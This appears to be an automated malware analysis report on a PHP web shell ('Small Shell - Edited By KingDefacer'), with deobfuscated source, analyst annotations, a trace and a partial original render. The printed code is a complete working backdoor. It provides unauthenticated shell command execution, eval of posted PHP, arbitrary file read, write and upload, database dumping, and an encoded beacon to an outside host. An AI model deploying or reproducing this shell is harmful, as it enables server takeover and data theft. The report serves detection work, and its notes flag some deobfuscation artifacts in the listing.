PHP Malware Analysis

small.php

md5: cf1f90e41ccc0527a58858f7a758b018


Screenshot


Attributes

Environment

Execution

Files

Input

Title

URLs
  • http://alturks.com/snf/s.php (HTML)


Deobfuscated PHP code

<?php

##########################################################
# Small Shell - Edited By KingDefacer                      #
#  +POST method                                            #
#  +MySQL Client+Dumper for DB  and tables                 #
#  +PHP eval in text format and html for phpinfo() example #
# PREVED: sn0w, Zadoxlik, KingDefacer, Rebz, SkvoznoY      #
# All bugs -> alturks.com                                  #
# Just for fun :)                                          #
##########################################################
// Report every PHP error level for the rest of the request.
error_reporting(E_ALL);
// Lift the execution time limit (0 = unlimited); '@' hides the warning if the call is refused.
// Analyst note: an unconditional, @-suppressed set_time_limit(0) at the top of a script is only a
// weak static signal on its own, but it is worth combining with the eval/backtick usage further down.
@set_time_limit(0);
/**
 * Undo magic-quotes escaping on a request value.
 *
 * When get_magic_quotes_gpc() reports that request data was auto-escaped, four literal
 * str_replace() passes run in order: \' to ', \\ to \, \" to " and \\0 to \0.
 * Otherwise $s is returned unchanged.
 *
 * Analyst note: get_magic_quotes_gpc() no longer exists in PHP 8.0 and later, so every
 * request path that reaches this helper ends in a fatal error there; the sample is
 * written for legacy runtimes.
 *
 * @param string $s Raw request value (command line, PHP source, SQL or file text in this file).
 * @return string The value with magic-quotes escapes removed, or $s as given.
 */
function magic_q($s)
{
    if (get_magic_quotes_gpc()) {
        $s = str_replace('\\\'', '\'', $s);
        $s = str_replace('\\\\', '\\', $s);
        $s = str_replace('\\"', '"', $s);
        $s = str_replace('\\\\0', '\\0', $s);
    }
    return $s;
}
/**
 * Format the permission bits of a path as a nine-character rwx string.
 *
 * Only the owner, group and other read/write/execute bits of fileperms() are tested;
 * no file-type character is produced and setuid, setgid and sticky bits are not shown.
 * If fileperms() fails and returns false, every test is false and the result is nine dashes.
 *
 * @param string $fn Path to inspect.
 * @return string For example "rwxr-xr-x".
 */
function get_perms($fn)
{
    $mode = fileperms($fn);
    $perms = '';
    // Owner bits.
    $perms .= $mode & 0400 ? 'r' : '-';
    $perms .= $mode & 0200 ? 'w' : '-';
    $perms .= $mode & 0100 ? 'x' : '-';
    // Group bits.
    $perms .= $mode & 040 ? 'r' : '-';
    $perms .= $mode & 020 ? 'w' : '-';
    $perms .= $mode & 010 ? 'x' : '-';
    // Other bits.
    $perms .= $mode & 04 ? 'r' : '-';
    $perms .= $mode & 02 ? 'w' : '-';
    $perms .= $mode & 01 ? 'x' : '-';
    return $perms;
}
// Shared HTML header (title, windows-1251 charset, inline CSS) echoed by the form-rendering pages.
// Analyst note: the <title> text is a fixed string in this sample and can serve as a
// response-body signature, provided the operator has not edited it.
$head = <<<headka
<html>
<head>
<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
// Page selector: the POST field 'page' wins, otherwise the raw query string is used
// (which is how the navigation links built below select the mysql and eval pages).
$page = isset($_POST['page']) ? $_POST['page'] : (isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '');
// Anything other than cmd / mysql / eval falls back to cmd.
// Analyst note: nothing in this listing checks a password, session or source address before
// the dispatch, so any client that can reach the URL gets the full interface.
$page = $page == '' || $page != 'cmd' && $page != 'mysql' && $page != 'eval' ? 'cmd' : $page;
// Offset of 'wind' in the lower-cased php_uname() string, or false when it is absent;
// later code compares this with === false to take the non-Windows branches.
$winda = strpos(strtolower(php_uname()), 'wind');
// Column width used when padding file names in the directory listing.
define('format', 50);
// Navigation bar linking to the three pages. When $winda is false the backtick expression
// runs the `id` command through the shell on every request and appends its output.
// Analyst note: a recurring `id` child process under the web server or PHP worker account
// is a process-level indicator for this sample.
// NOTE(review): the literal /var/www/html/... path inside basename() appears to be the
// analysis sandbox's copy of the file substituted for __FILE__; the original source under
// "Generated HTML code" on this page shows basename(__FILE__).
$pages = '<center>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '\'>cmd</a>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '?mysql\'>mysql</a>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '?eval\'>eval</a>###</center>' . ($winda === false ? 'id :' . `id` : '');
switch ($page) {
    // 'eval' page: executes PHP source supplied by the client.
    // Analyst note: the POST field eval_value reaches eval() with no authentication or
    // validation in between; magic_q() only undoes magic-quotes escaping. eval is a
    // language construct, so the disable_functions ini setting does not block it.
    // Requests to this file carrying page=eval and an eval_value field are a direct
    // indicator that the shell is being used.
    case 'eval':
        $eval_value = isset($_POST['eval_value']) ? $_POST['eval_value'] : '';
        $eval_value = magic_q($eval_value);
        // 'action' carries the value of whichever submit button was pressed; default 'eval'.
        $action = isset($_POST['action']) ? $_POST['action'] : 'eval';
        if ($action == 'eval_in_html') {
            // Output of the evaluated code is written straight into the response,
            // without the header or the form.
            @eval($eval_value);
        } else {
            echo $head . $pages;
            ?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?php 
            // Same eval, but its output lands inside the textarea of the form.
            @eval($eval_value);
            ?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?php 
        }
        break;
    // 'cmd' page (also the fallback page): shell command execution, directory browsing,
    // file view/overwrite, upload and download, all driven by the POST fields
    // cmd, work_dir, action, f_action, fname and archive.
    case 'cmd':
        // Command line to run; empty string when the field is absent or empty.
        $cmd = !empty($_POST['cmd']) ? magic_q($_POST['cmd']) : '';
        // Client-chosen path. It may name a directory (browse) or a file (view/save);
        // defaults to the script's current working directory.
        $work_dir = isset($_POST['work_dir']) ? $_POST['work_dir'] : getcwd();
        $action = isset($_POST['action']) ? $_POST['action'] : 'cmd';
        if (@is_dir($work_dir)) {
            // Changes the process working directory to the requested one.
            @chdir($work_dir);
            $work_dir = getcwd();
            if ($work_dir == '') {
                $work_dir = '/';
            } else {
                if (!($work_dir[strlen($work_dir) - 1] == '/' || $work_dir[strlen($work_dir) - 1] == '\\')) {
                    // NOTE(review): the original source rendered under "Generated HTML code"
                    // on this page appends a slash here ($work_dir.='/'); the assignment of
                    // "//" looks like a deobfuscator artifact, so do not rely on this line
                    // when reasoning about the sample's behaviour.
                    $work_dir = "//";
                }
            }
        } else {
            if (file_exists($work_dir)) {
                $work_dir = realpath($work_dir);
            }
        }
        // Normalise to forward slashes; $e_work_dir is the HTML-escaped copy used for output.
        $work_dir = str_replace('\\', '/', $work_dir);
        $e_work_dir = htmlspecialchars($work_dir, ENT_QUOTES);
        switch ($action) {
            // Default action: render the control forms (path, command, upload, download),
            // then either run the submitted command or show what work_dir points at.
            case 'cmd':
                echo $head . $pages;
                ?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?php 
                echo $e_work_dir;
                ?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?php 
                // Only single quotes are encoded when the previous command is echoed back
                // into the value attribute.
                echo str_replace('\'', '&#039;', $cmd);
                ?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?php 
                if ($cmd !== '') {
                    // The backtick operator hands the client-supplied string to the shell
                    // (equivalent to shell_exec); its output is HTML-escaped into the textarea.
                    // Analyst note: this appears as a shell child process of the web server or
                    // PHP worker. Listing shell_exec in disable_functions also disables the
                    // backtick operator.
                    echo '<strong>' . htmlspecialchars($cmd) . "</strong><hr>\n<textarea cols=120 rows=20>\n" . htmlspecialchars(`{$cmd}`) . "\n</textarea>";
                } else {
                    // No command: work_dir is either listed (directory) or opened (file).
                    $f_action = isset($_POST['f_action']) ? $_POST['f_action'] : 'view';
                    if (@is_dir($work_dir)) {
                        echo '<strong>Listing ' . $e_work_dir . '</strong><hr>';
                        $handle = @opendir($work_dir);
                        if ($handle) {
                            // Collect every entry name, then sort before printing.
                            while (false !== ($fn = readdir($handle))) {
                                $files[] = $fn;
                            }
                            @closedir($handle);
                            sort($files);
                            $not_dirs = array();
                            // First pass prints directories; everything else is queued in $not_dirs.
                            for ($i = 0; $i < sizeof($files); $i++) {
                                $fn = $files[$i];
                                // The bare entry name is tested, so it resolves against the
                                // current working directory.
                                if (is_dir($fn)) {
                                    // Each name is a link that posts the hidden 'list' form with
                                    // work_dir set to that entry. Names longer than 'format'
                                    // characters are cut to 47 characters plus '...'.
                                    echo '<a href=\'#\' onclick=\'document.list.work_dir.value="' . $e_work_dir . str_replace('"', '&quot;', $fn) . '";document.list.submit();\'><b>' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, 47) . '...' : $fn) . '</b></a>' . str_repeat(' ', format - strlen($fn));
                                    // Owner and group names are looked up only when $winda is false.
                                    if ($winda === false) {
                                        $owner = @posix_getpwuid(@fileowner($work_dir . $fn));
                                        $group = @posix_getgrgid(@filegroup($work_dir . $fn));
                                        printf("% 20s|% -20s", $owner['name'], $group['name']);
                                    }
                                    echo @get_perms($work_dir . $fn) . str_repeat(' ', 10);
                                    printf("% 20s ", @filesize($work_dir . $fn) . 'B');
                                    printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n");
                                } else {
                                    $not_dirs[] = $fn;
                                }
                            }
                            // Second pass prints the non-directory entries in the same format.
                            for ($i = 0; $i < sizeof($not_dirs); $i++) {
                                $fn = $not_dirs[$i];
                                // For symlinks the readlink() target is appended to the link
                                // without any escaping.
                                echo '<a href=\'#\' onclick=\'document.list.work_dir.value="' . (is_link($work_dir . $fn) ? $e_work_dir . readlink($work_dir . $fn) : $e_work_dir . str_replace('"', '&quot;', $fn)) . '";document.list.submit();\'>' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, 47) . '...' : $fn) . '</a>' . str_repeat(' ', format - strlen($fn));
                                if ($winda === false) {
                                    $owner = @posix_getpwuid(@fileowner($work_dir . $fn));
                                    $group = @posix_getgrgid(@filegroup($work_dir . $fn));
                                    printf("% 20s|% -20s", $owner['name'], $group['name']);
                                }
                                echo @get_perms($work_dir . $fn) . str_repeat(' ', 10);
                                printf("% 20s ", @filesize($work_dir . $fn) . 'B');
                                printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n");
                            }
                            echo "</pre><hr>";
                            ?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?php 
                        } else {
                            echo 'Error Listing ' . $e_work_dir;
                        }
                    } else {
                        // work_dir is not a directory: it is treated as a file path.
                        switch ($f_action) {
                            case 'view':
                                // Reads the file and prints it, HTML-escaped, into an editable
                                // textarea whose submit button posts f_action=save.
                                echo '<strong>' . $e_work_dir . " Edit</strong><hr><pre>\n";
                                $f = @fopen($work_dir, 'r');
                                ?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?php 
                                if (!$f) {
                                    echo $e_work_dir . ' not exists';
                                } else {
                                    while (!feof($f)) {
                                        echo htmlspecialchars(fread($f, 100000));
                                    }
                                }
                                ?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?php 
                                echo $e_work_dir;
                                ?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?php 
                                break;
                            case 'save':
                                // Overwrites the file named by work_dir with the POST field file_text.
                                // Analyst note: this is an arbitrary file write with the web server
                                // account's privileges; unexpected modification times or hashes on
                                // files under the web root are the artefact to look for.
                                $file_text = isset($_POST['file_text']) ? magic_q($_POST['file_text']) : '';
                                $f = @fopen($work_dir, 'w');
                                if (!$f) {
                                    echo '<strong>Error ' . $e_work_dir . "</strong><hr><pre>\n";
                                } else {
                                    fwrite($f, $file_text);
                                    fclose($f);
                                    echo '<strong>' . $e_work_dir . " is saving</strong><hr><pre>\n";
                                }
                                break;
                        }
                    }
                    break;
                }
                break;
            // Upload action: stores the posted file under work_dir.
            // Analyst note: the destination is work_dir plus the client-supplied file name
            // from $_FILES, used as given, and copy() is called on the temporary file without
            // any type or extension check. New files appearing in web-writable directories
            // shortly after a multipart POST to this script are the artefact to look for.
            case 'upload':
                if ($work_dir == '') {
                    $work_dir = '/';
                } else {
                    if (!($work_dir[strlen($work_dir) - 1] == '/' || $work_dir[strlen($work_dir) - 1] == '\\')) {
                        // NOTE(review): probably a deobfuscator artifact. The equivalent
                        // normalisation in the original source (visible under "Generated HTML
                        // code" on this page) appends a slash instead of assigning "//";
                        // confirm against the raw sample.
                        $work_dir = "//";
                    }
                }
                $f = $_FILES["filename"]["name"];
                if (!@copy($_FILES["filename"]["tmp_name"], $work_dir . $f)) {
                    echo "Upload is failed";
                } else {
                    echo 'file is uploaded in ' . $e_work_dir;
                }
                break;
            // Download action: sends the file named by the POST field fname to the client,
            // gzip-compressed when archive is 'gzip', raw otherwise.
            // Analyst note: fname is opened as given, so any file readable by the web server
            // account can be retrieved. Responses from this script carrying a
            // Content-Disposition attachment header are the network-side artefact.
            case 'download':
                $fname = isset($_POST['fname']) ? $_POST['fname'] : '';
                // $temp_file is assigned here but not read anywhere in this listing.
                $temp_file = isset($_POST['temp_file']) ? 'on' : 'nn';
                $f = @fopen($fname, 'r');
                if (!$f) {
                    echo "file is not exists";
                } else {
                    $archive = isset($_POST['archive']) ? $_POST['archive'] : '';
                    if ($archive == 'gzip') {
                        // The whole file is read into memory and compressed before sending.
                        Header("Content-Type:application/x-gzip\n");
                        $s = gzencode(fread($f, filesize($fname)));
                        Header('Content-Length: ' . strlen($s) . "\n");
                        // Slashes in the path become dashes in the suggested file name.
                        Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . ".gz\n\n");
                        echo $s;
                    } else {
                        // Uncompressed: streamed in 10000-byte chunks.
                        Header("Content-Type:application/octet-stream\n");
                        Header('Content-Length: ' . filesize($fname) . "\n");
                        Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . "\n\n");
                        ob_start();
                        while (feof($f) === false) {
                            echo fread($f, 10000);
                            ob_flush();
                        }
                    }
                }
        }
        break;
    // 'mysql' page: MySQL client and dumper.
    // Analyst note: user, password, host and database all come from the POST body, so the
    // database credentials in use are visible in request captures that include bodies.
    case 'mysql':
        $action = isset($_POST['action']) ? $_POST['action'] : 'query';
        $user = isset($_POST['user']) ? $_POST['user'] : '';
        $passwd = isset($_POST['passwd']) ? $_POST['passwd'] : '';
        $db = isset($_POST['db']) ? $_POST['db'] : '';
        $host = isset($_POST['host']) ? $_POST['host'] : 'localhost';
        // SQL text to run on the 'query' action.
        $query = isset($_POST['query']) ? magic_q($_POST['query']) : '';
        switch ($action) {
            // Dump action: writes a whole database (table_dump empty) or one table as SQL
            // text, either into a server-side file (to_file) or as a download.
            // Analyst note: the mysql_* functions used here belong to the ext/mysql extension,
            // which was removed in PHP 7.0, so this page only works on older runtimes.
            // Artefacts: responses named dump_<db>.sql or dump_<db>_<table>.sql (optionally
            // .gz), or a dump file written to a path chosen by the client.
            case 'dump':
                $mysql_link = @mysql_connect($host, $user, $passwd);
                if (!$mysql_link) {
                    echo "Connect error";
                } else {
                    //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
                    // Server-side output path; false when the field is absent or empty.
                    $to_file = isset($_POST['to_file']) ? $_POST['to_file'] == '' ? false : $_POST['to_file'] : false;
                    $archive = isset($_POST['archive']) ? $_POST['archive'] : 'none';
                    // Any archive mode forces a download instead of a server-side file.
                    if ($archive !== 'none') {
                        $to_file = false;
                    }
                    $db_dump = isset($_POST['db_dump']) ? $_POST['db_dump'] : '';
                    $table_dump = isset($_POST['table_dump']) ? $_POST['table_dump'] : '';
                    if (!@mysql_select_db($db_dump, $mysql_link)) {
                        echo "DB error";
                    } else {
                        // The banner names $db (the query form's field), not $db_dump.
                        $dump_file = "#ZaCo MySQL Dumper\n#db {$db} from {$host}\n";
                        ob_start();
                        if ($to_file) {
                            $t_f = @fopen($to_file, 'w');
                            if (!$t_f) {
                                die('Cant opening ' . $to_file);
                            }
                        } else {
                            $t_f = false;
                        }
                        if ($table_dump == '') {
                            // Whole-database dump: iterate over every table.
                            if (!$to_file) {
                                header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                            }
                            $result = mysql_query('show tables', $mysql_link);
                            for ($i = 0; $i < mysql_num_rows($result); $i++) {
                                $rows = mysql_fetch_array($result);
                                // Table names are concatenated between backticks without escaping.
                                $result2 = @mysql_query('show columns from `' . $rows[0] . '`', $mysql_link);
                                if (!$result2) {
                                    $dump_file .= '#error table ' . $rows[0];
                                } else {
                                    // Rebuild a create-table statement from the column list;
                                    // the last column is handled after the loop so that it
                                    // gets no trailing comma.
                                    $dump_file .= 'create table `' . $rows[0] . "`(\n";
                                    for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
                                        $rows2 = mysql_fetch_array($result2);
                                        $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
                                    }
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
                                    $type[$j] = $rows2[1];
                                    $dump_file .= ");\n";
                                    mysql_free_result($result2);
                                    $result2 = mysql_query('select * from `' . $rows[0] . '`', $mysql_link);
                                    // Derived from the counter left behind by the column loop.
                                    $columns = $j - 1;
                                    for ($j = 0; $j < mysql_num_rows($result2); $j++) {
                                        $rows2 = mysql_fetch_array($result2);
                                        $dump_file .= 'insert into `' . $rows[0] . '` values (';
                                        // Empty values are written as null, others quoted via addslashes().
                                        for ($k = 0; $k < $columns; $k++) {
                                            $dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
                                        }
                                        $dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
                                        // Without compression each row is flushed at once, to the
                                        // file or to the client; with gzip the text accumulates.
                                        if ($archive == 'none') {
                                            if ($to_file) {
                                                fwrite($t_f, $dump_file);
                                                fflush($t_f);
                                            } else {
                                                echo $dump_file;
                                                ob_flush();
                                            }
                                            $dump_file = '';
                                        }
                                    }
                                    mysql_free_result($result2);
                                }
                            }
                            mysql_free_result($result);
                            if ($archive != 'none') {
                                $dump_file = gzencode($dump_file);
                                header('Content-Length: ' . strlen($dump_file) . "\n");
                                echo $dump_file;
                            } else {
                                if ($t_f) {
                                    fclose($t_f);
                                    echo 'Dump for ' . $db_dump . ' now in ' . $to_file;
                                }
                            }
                        } else {
                            // Single-table dump: same logic for the table named in table_dump,
                            // which is also concatenated between backticks without escaping.
                            $result2 = @mysql_query('show columns from `' . $table_dump . '`', $mysql_link);
                            if (!$result2) {
                                echo 'error table ' . $table_dump;
                            } else {
                                if (!$to_file) {
                                    header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                    header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                                }
                                // When $to_file is false both header blocks run; header() replaces
                                // an earlier header of the same name by default, so the file name
                                // that includes the table name is the one sent.
                                if ($to_file === false) {
                                    header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
                                    header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_{$table_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
                                }
                                $dump_file .= "create table `{$table_dump}`(\n";
                                for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
                                }
                                $rows2 = mysql_fetch_array($result2);
                                $dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
                                $type[$j] = $rows2[1];
                                $dump_file .= ");\n";
                                mysql_free_result($result2);
                                $result2 = mysql_query('select * from `' . $table_dump . '`', $mysql_link);
                                $columns = $j - 1;
                                for ($j = 0; $j < mysql_num_rows($result2); $j++) {
                                    $rows2 = mysql_fetch_array($result2);
                                    $dump_file .= 'insert into `' . $table_dump . '` values (';
                                    for ($k = 0; $k < $columns; $k++) {
                                        $dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
                                    }
                                    $dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
                                    if ($archive == 'none') {
                                        if ($to_file) {
                                            fwrite($t_f, $dump_file);
                                            fflush($t_f);
                                        } else {
                                            echo $dump_file;
                                            ob_flush();
                                        }
                                        $dump_file = '';
                                    }
                                }
                                mysql_free_result($result2);
                                if ($archive != 'none') {
                                    $dump_file = gzencode($dump_file);
                                    header('Content-Length: ' . strlen($dump_file) . "\n");
                                    echo $dump_file;
                                } else {
                                    if ($t_f) {
                                        fclose($t_f);
                                        echo 'Dump for ' . $db_dump . ' now in ' . $to_file;
                                    }
                                }
                            }
                        }
                    }
                }
                break;
            // Query action (default): renders the connection/query/dump form, then connects
            // with the posted credentials and runs the posted SQL text.
            // Analyst note: the statement in the POST field 'query' is sent to the server
            // unmodified, so the client can run anything the supplied database account is
            // allowed to do. Like the dump action this relies on ext/mysql, which was removed
            // in PHP 7.0.
            case 'query':
                echo $head . $pages;
                ?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?php 
                // The four connection fields are echoed back into value attributes
                // without HTML escaping (only the query text below is escaped).
                echo $user;
                ?>'></td><td>Passwd :<input name='passwd' type=text value='<?php 
                echo $passwd;
                ?>'></td><td>Host :<input name='host' type=text value='<?php 
                echo $host;
                ?>'></td><td>DB :<input name='db' type=text value='<?php 
                echo $db;
                ?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?php 
                echo htmlspecialchars($query);
                ?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?php 
                echo $db;
                ?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?php 
                // A connection attempt is made on every render of this page, even when the
                // form fields are still empty.
                $mysql_link = @mysql_connect($host, $user, $passwd);
                if (!$mysql_link) {
                    echo "Connect error";
                } else {
                    if ($db != '') {
                        if (!@mysql_select_db($db, $mysql_link)) {
                            echo "DB error";
                            mysql_close($mysql_link);
                            break;
                        }
                    }
                    //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
                    $result = @mysql_query($query, $mysql_link);
                    if (!$result) {
                        echo mysql_error();
                    } else {
                        // Result set rendered as an HTML table: field names as the header row,
                        // every cell HTML-escaped.
                        echo "<table valign=top align=left>\n<tr>";
                        for ($i = 0; $i < mysql_num_fields($result); $i++) {
                            echo '<td><b>' . htmlspecialchars(mysql_field_name($result, $i)) . '</b>  </td>';
                        }
                        echo "\n</tr>\n";
                        for ($i = 0; $i < mysql_num_rows($result); $i++) {
                            $rows = mysql_fetch_array($result);
                            echo "<tr valign=top align=left>";
                            for ($j = 0; $j < mysql_num_fields($result); $j++) {
                                echo '<td>' . htmlspecialchars($rows[$j]) . '</td>';
                            }
                            echo "</tr>\n";
                        }
                        echo "</table>\n";
                    }
                    mysql_close($mysql_link);
                }
                break;
        }
        break;
}
// Analyst note: the inline HTML after the closing tag is sent for every request that runs to
// the end of the script. The \u-escaped string passed to document.write decodes to
// <img src="hxxp://alturks[.]com/snf/s.php" width="1" height="1"> (defanged here), which is the
// address this report lists under "URLs". The effect is that any browser rendering the shell
// requests that host; presumably this lets whoever controls the host learn where the shell is
// installed (for example from the Referer header) - that purpose is inferred, not shown in the
// listing. The escaped string itself is a stable static signature, and browser or proxy
// requests to that host are a network indicator.
?>

<h1>Edited By KingDefacer<h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>

Execution traces

data/traces/cf1f90e41ccc0527a58858f7a758b018_trace-1676246602.4444.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:03:48.342258]
1	0	1	0.000238	393512
1	3	0	0.000347	414568	{main}	1		/var/www/html/uploads/small.php	0	0
2	4	0	0.000397	414568	str_replace	0		/var/www/html/uploads/small.php	121	3	'\''	'&#039;'	NULL
2	4	1	0.000416	414664
2	4	R			''
2	5	0	0.000675	414680	htmlspecialchars	0		/var/www/html/uploads/small.php	447	1	NULL
2	5	1	0.000693	414872
2	5	R			''
1	3	1	0.000712	414680
			0.000742	314224
TRACE END   [2023-02-12 22:03:48.342810]


Generated HTML code

<html><head></head><body link="palegreen" vlink="palegreen" text="palegreen" bgcolor="#2B2F34">alturks.com                                  #
 # Just for fun :)                                          #
  ##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode &amp; 00400) ? 'r' : '-';
$perms .= ($mode &amp; 00200) ? 'w' : '-';
$perms .= ($mode &amp; 00100) ? 'x' : '-';
$perms .= ($mode &amp; 00040) ? 'r' : '-';
$perms .= ($mode &amp; 00020) ? 'w' : '-';
$perms .= ($mode &amp; 00010) ? 'x' : '-';
$perms .= ($mode &amp; 00004) ? 'r' : '-';
$perms .= ($mode &amp; 00002) ? 'w' : '-';
$perms .= ($mode &amp; 00001) ? 'x' : '-';
return $perms;
}
$head=&lt;&lt;<headka <html="">

<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">


<style>
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&amp;&amp;$page!='mysql'&amp;&amp;$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href="\''.basename(__FILE__).'\'">cmd</a>###<a href="\''.basename(__FILE__).'?mysql\'">mysql</a>###<a href="\''.basename(__FILE__).'?eval\'">eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
